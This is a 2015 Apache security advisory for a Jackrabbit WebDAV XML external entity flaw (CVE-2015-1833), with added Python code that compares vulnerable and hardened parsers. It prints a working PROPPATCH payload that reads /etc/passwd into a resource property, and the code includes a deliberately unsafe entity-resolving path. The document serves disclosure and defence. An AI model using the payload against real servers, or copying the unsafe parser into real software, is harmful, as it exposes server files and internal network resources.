Friday, 22 May 2015

CVE-2015-1833: Jackrabbit WebDAV XXE vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Jackrabbit 2.0.0 - 2.0.5
Jackrabbit 2.2.0 - 2.2.13
Jackrabbit 2.4.0 - 2.4.5
Jackrabbit 2.6.0 - 2.6.5
Jackrabbit 2.8.0
Jackrabbit 2.10.0
The unsupported Jackrabbit 1.x versions may also be affected

Impact:
The contents of files and other network resources that are accessible to the server running the WebDAV component may be exposed to users.

Description:
When processing a WebDAV request body containing XML, the XML parser can be instructed (through an external entity declared in the request's DOCTYPE) to read content from network resources accessible to the host, identified by URI schemes such as "http(s)" or "file". Depending on the WebDAV request, this can be used not only to trigger requests from the server into its internal network, but also to insert the fetched content into the request itself, potentially exposing it to the attacker and to other users (for instance, by inserting said content into a WebDAV property value using a PROPPATCH request and later reading it back). See also IETF RFC 4918, Section 20.6.

Mitigation:
This vulnerability only affects systems that use Jackrabbit's WebDAV component. If this isn't in use, no immediate action is required.

Solution:
2.10.x users should upgrade to 2.10.1
2.8.x users should obtain the latest source from svn or apply the patch which will be included in 2.8.1
2.6.x users should obtain the latest source from svn or apply the patch which will be included in 2.6.6
2.4.x users should obtain the latest source from svn or apply the patch which will be included in 2.4.6
2.2.x users should apply the patch which will be included in 2.2.14
2.0.x users should apply the patch which will be included in 2.0.6
Patches are attached to <https://issues.apache.org/jira/browse/JCR-3883>


Example:

The following payload, sent in a WebDAV PROPPATCH request, will read the file "/etc/passwd" and include its textual content in the JCR property "test" of the addressed resource. The value could then be retrieved using a WebDAV PROPFIND request, JCR API calls, etc.

<?xml version="1.0"?>
<!DOCTYPE propertyupdate [
  <!ENTITY xee SYSTEM "file:///etc/passwd">
]>
<propertyupdate xmlns="DAV:">
  <set>
    <prop>
      <test xmlns="">&xee;</test>
    </prop>
  </set>
</propertyupdate>
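To make the mechanism in the Description and the PROPPATCH payload above concrete, here is an added example (written for this page, not Jackrabbit's own code or its fix) that parses the payload with a small expat-based PROPPATCH reader in two configurations: once with external entities resolved, which is the behaviour the advisory describes, and once hardened so that any DOCTYPE in a request body is rejected. It also shows the intermediate setting in which external entities are merely skipped. The entity points at a constructed temporary file rather than /etc/passwd; the function and class names are this example's own.

```python
"""Added example, not part of the advisory or of Jackrabbit: a minimal
DAV: propertyupdate parser on Python's expat bindings, run in vulnerable
and hardened configurations against the advisory's PROPPATCH payload."""
import os
import pathlib
import tempfile
import urllib.request
import xml.parsers.expat as expat

DAV_NS = "DAV:"


class DtdNotAllowed(ValueError):
    """Raised by the hardened configuration when a body carries a DOCTYPE."""


def parse_proppatch(body: bytes, resolve_external: bool, forbid_dtd: bool) -> dict:
    """Return {property_name: text} for the <set><prop> children of a
    DAV: propertyupdate body.

    resolve_external=True reproduces the vulnerable behaviour: each SYSTEM
    entity is fetched from its URI and spliced into the property value.
    forbid_dtd=True is the hardened behaviour: any DOCTYPE aborts parsing,
    so no entity can be declared at all.
    """
    props = {}
    state = {"depth": 0, "name": None, "buf": []}
    parser = expat.ParserCreate(namespace_separator=" ")

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if forbid_dtd:
            raise DtdNotAllowed("DOCTYPE %r not allowed in a WebDAV body" % name)

    def external_entity_ref(context, base, system_id, public_id):
        if not resolve_external:
            return 1  # entity is skipped: it expands to nothing
        # Vulnerable path: fetch whatever the request-supplied URI names and
        # parse it as the entity's replacement text. The child parser inherits
        # the handlers below, so the fetched bytes land in the property value.
        with urllib.request.urlopen(system_id) as resp:
            data = resp.read()
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    def start_element(name, attrs):
        state["depth"] += 1
        if state["depth"] == 1 and name != DAV_NS + " propertyupdate":
            raise ValueError("not a DAV: propertyupdate body: %r" % name)
        if state["depth"] == 4:  # propertyupdate / set / prop / <property>
            state["name"] = name
            state["buf"] = []

    def char_data(data):
        if state["name"] is not None:
            state["buf"].append(data)

    def end_element(name):
        if state["depth"] == 4 and state["name"] == name:
            props[name] = "".join(state["buf"])
            state["name"] = None
        state["depth"] -= 1

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(body, True)
    return props


def demo() -> dict:
    """Run the advisory's payload (pointed at a constructed file) through
    the three configurations and a DOCTYPE-free body through the hardened one."""
    secret = "constructed-secret-do-not-leak"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret)
        path = fh.name
    try:
        uri = pathlib.Path(path).resolve().as_uri()  # stands in for file:///etc/passwd
        payload = (
            '<?xml version="1.0"?>\n'
            '<!DOCTYPE propertyupdate [\n'
            '  <!ENTITY xee SYSTEM "%s">\n'
            ']>\n'
            '<propertyupdate xmlns="DAV:"><set><prop>'
            '<test xmlns="">&xee;</test>'
            '</prop></set></propertyupdate>' % uri
        ).encode()
        benign = (
            '<?xml version="1.0"?><propertyupdate xmlns="DAV:"><set><prop>'
            '<test xmlns="">hello</test></prop></set></propertyupdate>'
        ).encode()
        result = {"secret": secret}
        result["vulnerable"] = parse_proppatch(payload, True, False)["test"]
        result["skipped"] = parse_proppatch(payload, False, False)["test"]
        try:
            parse_proppatch(payload, False, True)
            result["hardened"] = "accepted"
        except DtdNotAllowed as exc:
            result["hardened"] = type(exc).__name__
        result["benign"] = parse_proppatch(benign, False, True)["test"]
        return result
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-10s %r" % (key, value))
```

The "vulnerable" run returns the file's contents as the value of the "test" property, which is exactly what a later PROPFIND would hand back to whoever asks; the "skipped" run shows that merely refusing to resolve external entities leaves the property empty but still accepts the DTD; the "hardened" run rejects the body outright while still accepting the ordinary, DOCTYPE-free PROPPATCH. Which of the two hardening choices a deployment wants depends on whether legitimate clients ever send DTDs; for WebDAV bodies they normally do not.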

Credit:
This issue was discovered by Mikhail Egorov <0ang3el@gmail.com>
